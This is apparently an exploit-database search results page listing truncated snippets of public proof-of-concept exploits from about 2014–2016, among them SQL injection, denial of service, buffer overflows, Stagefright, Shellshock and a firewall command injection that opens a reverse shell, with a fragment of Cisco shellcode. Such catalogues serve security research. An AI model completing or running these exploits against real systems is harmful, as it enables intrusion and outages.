276 matches found
Zabbix 2.0 < 3.0.3 - SQL Injection
Exploit for php platform in category web applications Exploit Title: 2.0 Zabbix 3.0.4 SQL Injection Python PoC Data: 20-08-2016 Software Link: www.zabbix.com Exploit Author: Unknownhttp://seclists.org/fulldisclosure/2016/Aug/82 Version: Zabbix 2.0-3.0.x3.0.4 PoC Author: Zzzians Contact:...
Python Exploit Development GDB Assistance: Peda
Python Exploit Development GDB Assistance PEDA is a Python GDB script with many handy commands to help speed up exploit development process on Linux/Unix. It is also a framework for writing custom interactive Python GDB commands. PEDA v1.1 Released Requirements PEDA 1.0 is only support Linux GDB...
Exploit for HTTP Response Splitting in Python
CVE-2016-5699-poc PoC code of CVE-2016-...
MySQL 5.5.45 - procedure analyse Function Denial of Service
MySQL 5.5.45 - procedure analyse Function Denial of Service !/usr/bin/env python Title: MySQL Procedure Analyse DoS Exploit Author: Osanda Malith Jayathissa @OsandaMalith E-Mail: osandacatunseen.is Version: Vulnerable upto MySQL 5.5.45 Original Write-up:...
MySQL 5.5.45 - procedure analyse Function Denial of Service
!/usr/bin/env python Title: MySQL Procedure Analyse DoS Exploit Author: Osanda Malith Jayathissa @OsandaMalith E-Mail: osandacatunseen.is Version: Vulnerable upto MySQL 5.5.45 Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-487...
Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow
Exploit for hardware platform in category remote exploits !/usr/bin/env python2.7 import socket import sys import struct import string import random import time Spawns a reverse cisco CLI cliShellcode = "\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"...
Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)
Exploit for Android platform in category remote exploits Source: https://github.com/NorthBit/Metaphor Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd. Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf Twitter:...
4images 1.7.11 Code Execution
!/usr/local/bin/python Exploit for 4images 1.7.11 Code Execution vulnerability An admin account is required to use this exploit Curesec GmbH import sys import re import argparse import requests requires requests lib parser = argparse.ArgumentParser parser.addargument"url", help="base url to...
SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow Exploit
Exploit for windows platform in category dos / poc !/usr/bin/env python -- coding: utf-8 -- Exploit Title : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC Discovery by : Luis Martínez Email : email protected Discovery Date : 18/11/2015 Vendor Homepage :...
ClipperCMS 1.3.0 - Code Execution
ClipperCMS 1.3.0 - Code Execution !/usr/local/bin/python Exploit for ClipperCMS 1.3.0 Code Execution vulnerability An account is required with rights to file upload eg a user in the Admin, Publisher, or Editor role The server must parse htaccess files for this exploit to work. Curesec GmbH...
XMPlay 3.8.1.12 Proof Of Concept
!/usr/bin/env python Exploit Title: XMPlay .pls Local Crash poc Date: 2015-08-16 Exploit Author: St0rn Twitter: st0rnpentest Vendor Homepage: http://www.un4seen.com/ Software Link: http://www.un4seen.com/download.php?xmplay38 Version: 3.8.1.12 Tested on: Windows 7 Stack Overflowing xmplay, but we...
ISC BIND 9 - TKEY Remote Denial of Service (PoC)
ISC BIND 9 - TKEY Remote Denial of Service PoC !/usr/bin/env python Exploit Title: PoC for BIND9 TKEY DoS Exploit Author: elceef Software Link: https://github.com/elceef/tkeypoc/ Version: ISC BIND 9 Tested on: multiple CVE : CVE-2015-5477 import socket import sys print'CVE-2015-5477 BIND9 TKEY Po...
Endian Firewall 3.0.0 - OS Command Injection (Python)
Endian Firewall 3.0.0 - OS Command Injection Python !/usr/bin/env python Endian Firewall Proxy User Password Change /cgi-bin/chpasswd.cgi OS Command Injection Exploit POC Reverse TCP Shell Ben Lincoln, 2015-06-28 http://www.beneaththewaves.net/ Requires knowledge of a valid proxy username and...
Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution Vulnerability
Proof of concept exploit for the Pitbull and w3tw0rk IRC bots that takes over the owner of a bot which then allows for remote code execution. thehunter.py Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution author: @shipcod3 description: pitbull-w3tw0rkhunter is POC exploit for Pitbull or w3tw0r...
Exploit for Out-of-bounds Write in Gnu Glibc
PoC exploit for CVE-2015-0235, a Glibc Gethostbyname DoS vulne...
IP.Board 3.4.7 SQL Injection
!/usr/bin/env python Sunday, November 09, 2014 - [email protected] IP.Board - http://sourceforge.net/projects/socksipy/ import socks, socket socks.setdefaultproxysocks.PROXYTYPESOCKS5, "127.0.0.1", 9050 socket.socket = socks.socksocket import urllib2, urllib def injectsql: try:...
Exploit for OS Command Injection in Gnu Bash
CGIShell ======== shellshock C...
Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)
No description provided by source. !/usr/bin/env python coding: utf-8 import os import syslog from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '87249' ssvid version = '1.0' author = 'coc' vulDate = '' createDat...
WWW File Share Pro v7.0 - Remote Denial of Service
Document Title: =============== WWW File Share Pro v7.0 - Remote Denial of Service References: =========== http://www.vulnerability-lab.com/getcontent.php?id=1309 View: https://www.youtube.com/watch?v=1Y-B7ctbixs Release Date: ============= 2014-08-29 Vulnerability Laboratory ID VL-ID:...
Freefloat FTP Server (LIST command) Buffer Overflow Exploit
No description provided by source. !/usr/bin/python from struct import pack import socket,sys import os print ||=============================================================|| print || || print || / \ 0-Exploit Zer0 Thunder || print || \ \ ,, / /--------------------------------------------|| prin...